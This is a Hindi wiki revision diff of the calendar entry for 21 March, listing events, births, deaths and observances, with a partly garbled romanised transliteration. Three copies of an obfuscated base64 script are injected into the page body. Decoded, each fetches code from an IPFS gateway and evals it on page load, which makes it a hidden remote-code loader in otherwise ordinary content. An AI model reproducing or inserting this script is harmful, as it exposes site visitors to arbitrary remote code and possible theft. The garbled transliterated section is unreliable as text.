Difference between revisions of "21 मार्च"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(24 intermediate revisions by 7 users not shown)
Line 1: Line 1:
 
{{कैलंडर}}
 
{{कैलंडर}}
  
[[ग्रेगोरी कैलंडर]] के अनुसार 21 मार्च [[वर्ष]] का 80 वाँ ([[लीप वर्ष]] में यह 81 वाँ) दिन है। साल मे अभी और 285 दिन शेष हैं।
+
[[ग्रेगोरी कैलंडर]] के अनुसार 21 मार्च [[वर्ष]] का 80 वाँ ([[लीप वर्ष]] में यह 81 वाँ) दिन है। साल में अभी और 285 दिन शेष हैं।
  
 
==21 मार्च की महत्त्वपूर्ण घटनाएँ==
 
==21 मार्च की महत्त्वपूर्ण घटनाएँ==
* [[2008]]- मारुती सुजुकी इंडिया लिमिटेड के पूर्व प्रबंध निदेशक जगदीश खट्टर को 'जेडी पावर एण्ड एसोसिएटेड फाऊंडर अवार्ड' से सम्मानित किया गया।
+
* [[1999]] - ब्रिटिश हास्य अभिनेता एर्नीवाइस का निधन।
 +
* [[2000]] - ताइवान की [[संसद]] ने [[चीन]] के साथ सीधे तौर पर व्यापार और परिवहन पर पिछले 50 सालों से चले आ रहे प्रतिबंध को समाप्त किया, गिरिजा प्रसाद कोइराला नेपाल के नये [[प्रधानमंत्री]] नियुक्त।
 +
* [[2006]] - रूस और चीन ने रक्षा व ऊर्जा के क्षेत्र में तीन बड़े समझौते किये।
 +
* [[2008]] -  
 +
**मारुती सुजुकी इंडिया लिमिटेड के पूर्व प्रबंध निदेशक जगदीश खट्टर को 'जेडी पावर एण्ड एसोसिएटेड फाऊंडर अवार्ड' से सम्मानित किया गया।
 +
**वैज्ञानिकों ने शनि ग्रह के चंद्रमा टाइटन पर महासागर होने के नये साक्ष्य प्राप्त किये।
 +
 
 
==21 मार्च को जन्मे व्यक्ति==
 
==21 मार्च को जन्मे व्यक्ति==
* [[1916]] - [[उस्ताद बिस्मिल्ला ख़ाँन]], [[शहनाई]] वादक ([[वाराणसी]])
+
* [[1955]] - [[जेयर बोलसोनारो]] - [[ब्राज़ील]] के 38वें राष्ट्रपति हैं।
* [[1978]] - [[रानी मुखर्जी]], भारतीय अभिनेत्री।
+
* [[1887]] - [[मानवेन्द्र नाथ राय]] - वर्तमान [[शताब्दी]] के भारतीय दार्शनिकों में क्रान्तिकारी विचारक तथा मानवतावाद के प्रबल समर्थक।
 +
* [[1912]] - [[ख़्वाजा खुर्शीद अनवर]] - प्रसिद्ध संगीतकार थे।
 +
* [[1916]] - [[शहनाई वादक]] [[उस्ताद बिस्मिल्ला ख़ान]]।
 +
* [[1978]] - [[रानी मुखर्जी]] - भारतीय अभिनेत्री हैं।
 +
* [[1934]] - [[बूटा सिंह]] - [[कांग्रेस]] के वरिष्ठ राजनेता तथा भूतपूर्व गृहमंत्री थे।
 +
* [[1925]] - [[पीटर ब्रुक]] - [[अंग्रेज़]] [[नाटक]] निर्देशक हैं।
 +
* [[1923]] - [[नटराज रामकृष्ण]] - [[भारत]] के एक नृत्य गुरु थे।
 +
 
 
==21 मार्च को हुए निधन==
 
==21 मार्च को हुए निधन==
 +
* 1827 - [[दौलतराव शिन्दे]], [[महादजी शिन्दे]] के [[भाई]] तुकोजीराव होल्कर का [[पौत्र]] था।
 +
* [[1952]] - [[केशव प्रसाद मिश्र]] -  [[हिन्दी]] के प्रमुख साहित्यकारों में से एक।
 +
* [[2003]] - [[शिवानी]], प्रसिद्ध उपन्यासकार
 +
* [[2009]] - [[मोहित शर्मा (मेजर)|मेजर मोहित शर्मा]] - भारतीय सेन्य अधिकारी थे, जिन्हें मरणोपरांत '[[अशोक चक्र]]' से सम्मानित किया गया था।
  
 
==21 मार्च के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==21 मार्च के महत्त्वपूर्ण अवसर एवं उत्सव==
 +
* [[विश्व डाउन सिंड्रोम दिवस]]
 +
* [[नौरोज़]]
 +
* [[विश्व वानिकी दिवस]]
 +
* [[विश्व कठपुतली दिवस]]
 +
* [[अंतरराष्ट्रीय रंगभेद उन्मूलन दिवस]]
 +
* [[विश्व कविता दिवस]]
  
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==

Latest revision as of 08:09, 21 March 2024

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 21 march varsh ka 80 vaan (lip varsh mean yah 81 vaan) din hai. sal mean abhi aur 285 din shesh haian.

21 march ki mahattvapoorn ghatanaean

  • 1999 - british hasy abhineta ernivais ka nidhan.
  • 2000 - taivan ki sansad ne chin ke sath sidhe taur par vyapar aur parivahan par pichhale 50 saloan se chale a rahe pratibandh ko samapt kiya, girija prasad koirala nepal ke naye pradhanamantri niyukt.
  • 2006 - roos aur chin ne raksha v oorja ke kshetr mean tin b de samajhaute kiye.
  • 2008 -
    • maruti sujuki iandiya limited ke poorv prabandh nideshak jagadish khattar ko 'jedi pavar end esosieted phaooandar avard' se sammanit kiya gaya.
    • vaijnanikoan ne shani grah ke chandrama taitan par mahasagar hone ke naye sakshy prapt kiye.

21 march ko janme vyakti

21 march ko hue nidhan

21 march ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>